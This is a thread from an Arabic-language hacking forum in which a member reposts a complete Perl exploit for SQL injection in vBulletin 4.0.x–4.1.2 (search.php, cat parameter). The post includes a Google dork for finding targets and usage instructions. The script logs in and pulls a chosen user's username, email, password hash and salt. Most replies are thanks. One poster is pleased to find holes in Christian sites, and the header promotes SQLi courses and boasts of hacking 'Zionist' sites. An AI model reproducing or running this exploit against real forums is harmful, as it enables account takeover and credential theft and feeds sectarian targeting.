1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ ثغره ] vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

الموضوع في '[ الـثـغـرات ]' بواسطة user01, بتاريخ ‏13 أكتوبر 2014.

كاتب الموضوع : user01 المشاهدات : 543 الردود : 9 ‏13 أكتوبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    user01
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏20 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    السلام عليكم يا شباب جنت اتصفح موقع ثغرات و لكيت هاي الثغرة


    [SQL]# vBulletin 4.0.x => 4.1.2 AUTOMATIC SQL Injection exploit
    # Author: D35m0nd142, <d35m0nd142@gmail.com>
    # Google Dork: inurl:search.php?search_type=1
    # Date: 02/09/2014
    # Vendor Homepage: vBulletin 5 Connect, The World's Leading Community Software
    # Tested on: vBulletin 4.1.2
    # Usage: perl exploit.pl <http://target> <valid username> <valid passwd> <existent group> <userid to hack>
    # Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc
    # Vulnerability discovered by: D4rkB1t

    #!/usr/bin/env perl
    use LWP::UserAgent;
    use HTTP::Cookies;

    $ua = LWP::UserAgent->new();
    $ua->agent("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0");
    $ua->cookie_jar({});
    $username = "username) from user where userid=$ARGV[4]#";
    $email = "email) from user where userid=$ARGV[4]#";
    $password = "password) from user where userid=$ARGV[4]#";
    $salt = "salt) from user where userid=$ARGV[4]#";
    @tofinds = ('database())#'); push(@tofinds,$username); push(@tofinds,$email); push(@tofinds,$password); push(@tofinds,$salt);

    sub request
    {
    $req = HTTP::Request->new(GET => $ARGV[0]);
    my $res1 = $ua->request($req);
    open(FILE01, "> vbloginout.txt"); print FILE01 $res1->content; close(FILE01);
    my $token = dumping("vbloginout.txt","token");
    if($token eq '' || $token eq 'guest')
    {
    print "SECURITYTOKEN not found!\n";
    $token = "1409782759-e58c864fcc4e1ec7e23d31439af4b8cc181b789f"; # HERE
    print "Attempting using $token as token.\n";
    }
    else
    {
    print "SECURITYTOKEN FOUND: $token\n";
    }

    print "Sending exploit...\n\n";
    sleep(1);
    my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php?search_type=1');
    $req->content_type('application/x-www-form-urlencoded');

    foreach $tofind (@tofinds)
    {
    $post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
    $req->content($post);
    my $res = $ua->request($req);
    open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
    my $location = dumping("vbloc.txt","loc");

    if($location !~ /$ARGV[0]/)
    {
    banner();
    break;
    }

    my $req1 = HTTP::Request->new(GET => $location);
    $req1->content_type('application/x-www-form-urlencoded');
    my $res1 = $ua->request($req1);
    open(FILE,"> vbout.txt");
    print FILE $res1->content;
    close(FILE);
    printout($tofind);
    dumping("vbout.txt","sql");
    print "\n";
    }
    print "\n";
    print "Do you want to run the second exploitation way? (y/n) -> ";
    $want = <STDIN>;
    if($want =~ /y/)
    {
    second_request($token);
    }
    }

    sub second_request
    {
    my ($token) = @_ ;
    print "Attempting using the second exploitation way..\n\n";
    sleep(2);
    my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php');
    $req->content_type('application/x-www-form-urlencoded');

    foreach $tofind (@tofinds)
    {
    $post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
    $req->content($post);
    my $res = $ua->request($req);
    open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
    my $location = dumping("vbloc.txt","loc");

    if($location !~ /$ARGV[0]/)
    {
    banner();
    exit(1);
    }

    my $req1 = HTTP::Request->new(GET => $location);
    $req1->content_type('application/x-www-form-urlencoded');
    my $res1 = $ua->request($req1);
    open(FILE,"> vbout.txt");
    print FILE $res1->content;
    close(FILE);
    printout($tofind);
    dumping("vbout.txt","sql");
    print "\n";
    }
    print "\n";
    }

    sub banner
    {
    print "[-] Exploit not successful!\n";
    if(token eq "1409563107-55b86c8f60ad36a41dedff21b06bdc8c9d949303")
    {
    print " Try to log in and log out from other any other sessions and run the exploit again.\n\n";
    }
    }

    sub printout
    {
    my ($tofind) = @_ ;
    if($tofind =~ /username/)
    {
    print "[+] User($ARGV[4]) Username: ";
    }
    elsif($tofind =~ /password/)
    {
    print "[+] User($ARGV[4]) Password: ";
    }
    elsif($tofind =~ /database/)
    {
    print "[+] Database Name: ";
    }
    elsif($tofind =~ /email/)
    {
    print "[+] User($ARGV[4]) Email: ";
    }
    elsif($tofind =~ /salt/)
    {
    print "[+] User($ARGV[4]) Salt: ";
    }
    }

    sub dumping
    {
    my ($filename, $par) = @_ ;
    open(MYFILE,"< ", $filename);
    my @words;
    while(<MYFILE>)
    {
    chomp;
    @words = split(' ');

    if($par eq "token")
    {
    my $ctrl = "n";
    foreach my $word (@words)
    {
    if($word =~ /SECURITYTOKEN/)
    {
    $ctrl = "y";
    }
    if($ctrl eq "y" and $word !~ /=/ and $word !~ /SECURITYTOKEN/)
    {
    $word =~ tr/;//d; $word =~ tr/\"//d;
    return $word;
    break;
    }
    }
    }

    elsif($par eq "sql")
    {
    foreach my $word (@words)
    {
    if($word =~ /:::/)
    {
    $word =~ tr/::://d;
    print "$word";
    }
    }
    }

    else
    {
    my $ctrl2 = "n";
    foreach my $word (@words)
    {
    if($word =~ /Location:/)
    {
    $ctrl2 = "y";
    }
    if($ctrl2 eq "y" and $word !~ /Location:/)
    {
    return $word;
    }
    }
    }
    }
    close(MYFILE);
    }

    sub login(@)
    {
    my $username = shift;
    my $password = shift;
    print "\nLogging in...\n";
    sleep(1);
    my $req = HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login');
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1409514185-74f04ec0932a6f070268bf287797b5dc0db05530&do=login&vb_login_md5password=&vb_login_md5password_utf=");
    $ua->cookie_jar({});
    my $res = $ua->request($req);
    request();
    }

    if($ARGV[0] eq '' || $ARGV[1] eq '' || $ARGV[2] eq '' || $ARGV[3] eq '' || $ARGV[4] eq '')
    {
    print "\n<! vBulletin 4.0.x => 4.1.2 Automatic SQL Injection exploit !>\n";
    print "Author: D35m0nd142\n\n";
    print "Usage: perl exploit.pl <<http://target> <valid username> <valid passwd> <existent group> <userid to hack>\n";
    print "Example: perl exploit.pl http://site.com myusername mypassword Administrators 1\n\n";
    exit(1);
    }

    print "\n<! vBulletin 4.0.x => 4.1.2 Automatic SQL Injection exploit !>\n";
    print "Author: D35m0nd142\n";
    sleep(1);
    login($ARGV[1],$ARGV[2]);

    @files = ('vbloginout.txt','vbout.txt','vbloc.txt');
    foreach $file (@files)
    {
    unlink $file;
    }[/SQL]
     


    جاري تحميل الصفحة...
  2. غير متصل

    k!lwa s&rian ro0t Expert
    طاقم الإدارة

    عضو منذ:
    ‏3 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,236
    نقاط الجائزة:
    الجنس:
    ذكر



  3. غير متصل

    SiL3nT M4n
    rankrank
    Developer

    عضو منذ:
    ‏19 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    الله يعطيك العافيه ياغالي
     


  4. غير متصل

    Security-baghdad
    rank
    Developer

    عضو منذ:
    ‏11 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    عشت بارك الله بك
     


  5. غير متصل

    Security-baghdad
    rank
    Developer

    عضو منذ:
    ‏11 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    عشت خوي مجهود رائع
     


  6. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    عاشت الايادي يا غالي
     


  7. غير متصل

    user01
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏20 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit



    ههههههه حبيبي انت اني افرح لما اشوف ثغرات بمواقع مسيحية لان هذا ايساعدنا حتى انزيد الحماية اكثر و اكثر
     


  8. غير متصل

    user01
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏20 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    انت العايش حبيبي نورت
     


  9. غير متصل

    MJHOOL
    rank
    Developer

    عضو منذ:
    ‏6 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    الله يعطيك العافية يابطل
     


  10. غير متصل

    - ! • ĻİǾŊ ÄĹ-3ЯÁQ • ! -
    rankrank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏17 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

    مبـــــــدع آستمر
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...